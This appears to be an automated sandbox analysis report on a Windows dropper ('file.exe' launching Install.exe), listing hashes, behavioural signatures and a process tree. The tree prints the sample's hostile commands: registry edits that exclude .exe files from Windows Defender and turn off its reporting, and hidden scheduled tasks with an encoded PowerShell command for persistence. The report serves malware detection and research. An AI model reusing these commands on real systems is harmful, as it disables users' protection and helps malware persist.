Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 21:05
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20221111-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
2d3ad18f288af345af2fb0c319b3b3f5
-
SHA1
1e9d7ccc74e26b99403e494eafd4a0a8dae516fd
-
SHA256
eb00ed9a3114cd089951b8eee0074c32f9e755428ac7d24aa093b9194465bf46
-
SHA512
1155c2bc81462c0b67bae8bc95369240411a217168445db662cb445cb7a9bd30d86f7bf0ecf040f7729f98cd41fbcb65c761c12cbbe5c54e2abbdbf6e6a838fe
-
SSDEEP
196608:91OKn156tz5ZmHtScKM0vwTcE2X2q2CsthMfnq:3OQkl4+vwwEtftLB
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
Install.exeInstall.exepid process 1092 Install.exe 3268 Install.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Control Panel\International\Geo\Nation Install.exe -
Drops file in System32 directory 1 IoCs
Processes:
Install.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\bgXzKyzKqQlJYhwcUn.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1168 schtasks.exe 4720 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.EXEpid process 4080 powershell.EXE 4080 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.EXEdescription pid process Token: SeDebugPrivilege 4080 powershell.EXE -
Suspicious use of WriteProcessMemory 44 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exepowershell.EXEdescription pid process target process PID 3280 wrote to memory of 1092 3280 file.exe Install.exe PID 3280 wrote to memory of 1092 3280 file.exe Install.exe PID 3280 wrote to memory of 1092 3280 file.exe Install.exe PID 1092 wrote to memory of 3268 1092 Install.exe Install.exe PID 1092 wrote to memory of 3268 1092 Install.exe Install.exe PID 1092 wrote to memory of 3268 1092 Install.exe Install.exe PID 3268 wrote to memory of 3796 3268 Install.exe forfiles.exe PID 3268 wrote to memory of 3796 3268 Install.exe forfiles.exe PID 3268 wrote to memory of 3796 3268 Install.exe forfiles.exe PID 3268 wrote to memory of 3336 3268 Install.exe forfiles.exe PID 3268 wrote to memory of 3336 3268 Install.exe forfiles.exe PID 3268 wrote to memory of 3336 3268 Install.exe forfiles.exe PID 3336 wrote to memory of 3552 3336 forfiles.exe cmd.exe PID 3336 wrote to memory of 3552 3336 forfiles.exe cmd.exe PID 3336 wrote to memory of 3552 3336 forfiles.exe cmd.exe PID 3796 wrote to memory of 976 3796 forfiles.exe cmd.exe PID 3796 wrote to memory of 976 3796 forfiles.exe cmd.exe PID 3796 wrote to memory of 976 3796 forfiles.exe cmd.exe PID 3552 wrote to memory of 5016 3552 cmd.exe reg.exe PID 3552 wrote to memory of 5016 3552 cmd.exe reg.exe PID 3552 wrote to memory of 5016 3552 cmd.exe reg.exe PID 976 wrote to memory of 4940 976 cmd.exe reg.exe PID 976 wrote to memory of 4940 976 cmd.exe reg.exe PID 976 wrote to memory of 4940 976 cmd.exe reg.exe PID 3552 wrote to memory of 1160 3552 cmd.exe reg.exe PID 3552 wrote to memory of 1160 3552 cmd.exe reg.exe PID 3552 wrote to memory of 1160 3552 cmd.exe reg.exe PID 976 wrote to memory of 2280 976 cmd.exe reg.exe PID 976 wrote to memory of 2280 976 cmd.exe reg.exe PID 976 wrote to memory of 2280 976 cmd.exe reg.exe PID 3268 wrote to memory of 1168 3268 Install.exe schtasks.exe PID 3268 wrote to memory of 1168 3268 Install.exe schtasks.exe PID 3268 wrote to memory of 1168 3268 Install.exe schtasks.exe PID 3268 wrote to memory of 4860 3268 Install.exe schtasks.exe PID 3268 wrote to memory of 4860 3268 Install.exe schtasks.exe PID 3268 wrote to memory of 4860 3268 Install.exe schtasks.exe PID 4080 wrote to memory of 2560 4080 powershell.EXE gpupdate.exe PID 4080 wrote to memory of 2560 4080 powershell.EXE gpupdate.exe PID 3268 wrote to memory of 4256 3268 Install.exe schtasks.exe PID 3268 wrote to memory of 4256 3268 Install.exe schtasks.exe PID 3268 wrote to memory of 4256 3268 Install.exe schtasks.exe PID 3268 wrote to memory of 4720 3268 Install.exe schtasks.exe PID 3268 wrote to memory of 4720 3268 Install.exe schtasks.exe PID 3268 wrote to memory of 4720 3268 Install.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Users\Admin\AppData\Local\Temp\7zS6E4F.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Users\Admin\AppData\Local\Temp\7zSFB0E.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3268 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:976 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4940
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2280
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3336 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:5016
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1160
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpvhVRKuK" /SC once /ST 05:26:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1168 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpvhVRKuK"4⤵PID:4860
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpvhVRKuK"4⤵PID:4256
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bgXzKyzKqQlJYhwcUn" /SC once /ST 22:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ATaWoTwmuQXaDzxNA\BXblJsnkYCqsjju\uepciCd.exe\" P7 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4720
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1248
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:376
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD5f765fe315ff7e418de1d30e29b3676a0
SHA13ec14d798571b5b491e8789e9a8533bbe2181722
SHA2565aba13c3e75170dcb1e42488a66c0d0d97ebf1e229f1e5c607cc629c82ba0e91
SHA5123d0f3f5635605455ae43b6e294b4191a6b2e822e6597d53da76eb25e5b05a4ef7d64685706cfee171c3b7446ac5a487a0a98fd64d1e4f5917df93f79200c93b5
-
Filesize
6.3MB
MD5f765fe315ff7e418de1d30e29b3676a0
SHA13ec14d798571b5b491e8789e9a8533bbe2181722
SHA2565aba13c3e75170dcb1e42488a66c0d0d97ebf1e229f1e5c607cc629c82ba0e91
SHA5123d0f3f5635605455ae43b6e294b4191a6b2e822e6597d53da76eb25e5b05a4ef7d64685706cfee171c3b7446ac5a487a0a98fd64d1e4f5917df93f79200c93b5
-
Filesize
6.8MB
MD59a9175dcd59ac6395582793f28a48aca
SHA10683dc4f5ce17435bc0430b32ce1c2931d0a37bb
SHA2561b80c69504b97f7af75e7bf9c382653c83d8bb428c0f216d733b594750132c70
SHA5126d21f4be9adc54111ed3abe16305b4fae36cbc5b5157a3e92920e3d250a44ccb0af78b20d33169e67e574d37881a483a927c31cc47ee5bb744d28db05f275bd2
-
Filesize
6.8MB
MD59a9175dcd59ac6395582793f28a48aca
SHA10683dc4f5ce17435bc0430b32ce1c2931d0a37bb
SHA2561b80c69504b97f7af75e7bf9c382653c83d8bb428c0f216d733b594750132c70
SHA5126d21f4be9adc54111ed3abe16305b4fae36cbc5b5157a3e92920e3d250a44ccb0af78b20d33169e67e574d37881a483a927c31cc47ee5bb744d28db05f275bd2